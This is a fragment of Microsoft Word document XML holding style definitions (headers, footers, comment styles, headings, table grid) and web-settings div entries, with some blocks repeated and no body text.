    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A1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11A"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A1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11A"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6F01"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6F01"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D6F01"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6F01"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D6F01"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6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F01"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Calibri" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DB2C10"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00363D4E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00363D4E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="authors-info">
    <w:name w:val="authors-info"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB6376"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="blue-tooltip">
    <w:name w:val="blue-tooltip"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB6376"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D228D6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00F16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0695"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="27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DB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0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3D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87"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009A7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088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20884"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00620884"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A1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11A"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A1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11A"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6F01"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6F01"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D6F01"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6F01"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001D6F01"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6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F01"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Calibri" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DB2C10"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00363D4E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00363D4E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="authors-info">
    <w:name w:val="authors-info"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB6376"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="blue-tooltip">
    <w:name w:val="blue-tooltip"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00CB6376"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D228D6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00F16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7838">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="341472336">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="615992549">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="773017070">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="863901460">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="957830537">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1063525878">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1076628665">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1102072230">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1190558888">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2753141">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1197811000">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1259488436">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1299844873">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="992761494">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="70D16D"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="70D16D"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="70D16D"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="70D16D"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1428623976">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="170268353">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1839029511">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="16542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3057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1579167723">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1609315713">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1672180070">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1675300871">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1803763293">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1830051767">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1832064706">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1916819285">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1964310893">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
